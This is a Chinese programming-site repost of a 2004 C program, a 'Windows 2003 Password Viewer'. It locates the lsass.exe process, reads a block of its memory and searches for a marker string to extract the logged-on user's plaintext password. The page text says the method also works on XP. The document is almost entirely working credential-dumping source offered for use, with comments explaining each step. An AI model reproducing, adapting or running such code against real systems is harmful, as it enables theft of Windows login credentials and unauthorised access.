XP 和2003的Lsass进程中明文密码

类别:VC语言 点击:0 评论:0 推荐:

用Winhex读取XP和2003下的Lsass进程的内存数据,可以读取当前登录用户的明文密码.

source code:

//********************************************************************************
// Version: V1.0
// Coder: WinEggDrop
// Date Release: 12/15/2004
// Purpose: To Demonstrate Searching Logon User Password On 2003 Box,The Method
//          Used Is Pretty Unwise,But This May Be The Only Way To Review The
//          Logon User's Password On Windows 2003.
// Test PlatForm: Windows 2003
// Compiled On: VC++ 6.0
//********************************************************************************
#include <stdio.h>
#include <windows.h>
#include <tlhelp32.h>

#define BaseAddress 0x002b5000        // The Base Memory Address To Search;The Password May Be Located Before The Address Or Far More From This Address,Which Causes The Result Unreliable

char  Password[MAX_PATH] = {0};        // Store The Found Password

// Function ProtoType Declaration
//------------------------------------------------------------------------------------------------------
BOOL  FindPassword(DWORD PID);
int   Search(char *Buffer,const UINT nSize);
DWORD GetLsassPID();
BOOL  Is2003();
//------------------------------------------------------------------------------------------------------
// End Of Fucntion ProtoType Declaration

int main()
{
    DWORD PID = 0;
    printf("Windows 2003 Password Viewer V1.0 By WinEggDrop\n\n");

    if (!Is2003())        // Check Out If The Box Is 2003
    {
        printf("The Program Can't Only Run On Windows 2003 Platform\n");
        return -1;
    }

    PID = GetLsassPID();        // Get The Lsass.exe PID

    if (PID == 0)        // Fail To Get PID If Returning Zerom
    {
        return -1;
    }

    FindPassword(PID);        // Find The Password From Lsass.exe Memory
    return 0;
}
// End main()

//------------------------------------------------------------------------------------
// Purpose: Search The Memory & Try To Get The Password
// Return Type: int
// Parameters:  
//           In: char *Buffer        --> The Memory Buffer To Search    
//          Out: const UINT nSize   --> The Size Of The Memory Buffer
// Note: The Program Tries To Locate The Magic String "LocalSystem Remote Procedure",
//       Since The Password Is Near The Above Location,But It's Not Always True That
//       We Will Find The Magic String,Or Even We Find It,The Password May Be Located
//       At Some Other Place.We Only Look For Luck
//------------------------------------------------------------------------------------
int Search(char *Buffer,const UINT nSize)
{
    UINT OffSet = 0;
    UINT i = 0;
    UINT j = 0 ;
    UINT Count = 0;
    if (Buffer == NULL)
    {
        return -1;
    }

    for (i = 0 ; i < nSize ; i++)
    {
        /* The Below Is To Find The Magic String,Why So Complicated?That Will Thank MS.The Separation From Word To Word
        Is Not Separated With A Space,But With A Ending Character,So Any Search API Like strstr() Will Fail To Locate
        The Magic String,We Have To Do It Manually And Slowly
        */
        if (Buffer[i] == 'L')
        {
            OffSet = 0;
            if (strnicmp(&Buffer[i + OffSet],"LocalSystem",strlen("LocalSystem")) == 0)
            {
                OffSet += strlen("LocalSystem") + 1;
                if (strnicmp(&Buffer[i + OffSet],"Remote",strlen("Remote")) == 0)
                {
                    OffSet += strlen("Remote") + 1;
                    if (strnicmp(&Buffer[i + OffSet],"Procedure",strlen("Procedure")) == 0)
                    {
                        OffSet += strlen("Procedure") + 1;
                        if (strnicmp(&Buffer[i + OffSet],"Call",strlen("Call")) == 0)
                        {
                            i += OffSet;
                            break;
                        }
                    }
                }
            }
        }
    }
    if (i < nSize)
    {
        ZeroMemory(Password,sizeof(Password));
        for (; i < nSize ; i++)
        {
            if (Buffer[i] == 0x02 && Buffer[i + 1] == 0 && Buffer[i + 2] == 0 && Buffer[i + 3] == 0 && Buffer[i + 4] == 0 && Buffer[i + 5] == 0 && Buffer[i + 6] == 0)
            {
                /* The Below Code Is To Retrieve The Password.Since The String Is In Unicode Format,So We Will Do It In
                That Way
                */
                j = i + 7;
                for (; j < nSize; j += 2)
                {
                    if (Buffer[j] >  0)
                    {
                        Password[Count++] = Buffer[j];
                    }
                    else
                    {
                        break;
                    }
                }
                return i + 7;        // One Flag To Indicate We Find The Password
            }
        }
    }
    return -1;        // Well,We Fail To Find The Password,And This Always Happens
}
// End Search

//------------------------------------------------------------------------------------
// Purpose: To Get The Lsass.exe PID
// Return Type: DWORD
// Parameters:  None
//------------------------------------------------------------------------------------
DWORD GetLsassPID()
{
    HANDLE hProcessSnap;
    HANDLE hProcess = NULL;
    PROCESSENTRY32 pe32;
    DWORD PID = 0;

    hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if( hProcessSnap == INVALID_HANDLE_VALUE )
    {
        printf("Fail To Create Snap Shot\n");
        return 0;
    }

    pe32.dwSize = sizeof(PROCESSENTRY32);

    if( !Process32First(hProcessSnap, &pe32))
    {
        CloseHandle(hProcessSnap);     // Must clean up the snapshot object!
        return 0;
    }

    do
    {
        if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0)
        {
            PID = pe32.th32ProcessID;
            break;
        }
    }while(Process32Next( hProcessSnap, &pe32));

    CloseHandle( hProcessSnap);
    return PID;
}
// End GetLsassPID()

//------------------------------------------------------------------------------------
// Purpose: To Find The Password
// Return Type: BOOLEAN
// Parameters:  
//           In: DWORD PID        ->        The Lsass.exe's PID
//------------------------------------------------------------------------------------
BOOL FindPassword(DWORD PID)
{
    HANDLE hProcess = NULL;
    char   Buffer[5 * 1024] = {0};
    DWORD  ByteGet = 0;
    int    Found = -1;

    hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID);        // Open Process
    if (hProcess == NULL)
    {
        printf("Fail To Open Process\n");
        return FALSE;
    }

    if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 * 1024,&ByteGet))        // Read The Memory From Lsass.exe
    {
        printf("Fail To Read Memory\n");
        CloseHandle(hProcess);
        return FALSE;
    }

    CloseHandle(hProcess);

    Found = Search(Buffer,ByteGet);        // Search The Password
    if (Found >= 0)        // We May Find The Password
    {
        if (strlen(Password) > 0)        // Yes,We Find The Password Even We Don't Know If The Password Is Correct Or Not
        {
            printf("Found Password At #0x%x -> \"%s\"\n",Found + BaseAddress,Password);
        }
    }
    else
    {
        printf("Fail To Find The Password\n");
    }
    return TRUE;
}
// End FindPassword

//------------------------------------------------------------------------------------
// Purpose: Check If The Box Is Windows 2003
// Return Type: BOOLEAN
// Parameters:  None
//------------------------------------------------------------------------------------
BOOL Is2003()
{
    OSVERSIONINFOEX osvi;
    BOOL b0sVersionInfoEx;
    ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX));
    osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);

    if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi)))
    {
        osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
    }
    return (osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2);
}
// End Is2003()
// End Of File

本文地址:http://com.8s8s.com/it/it163.htm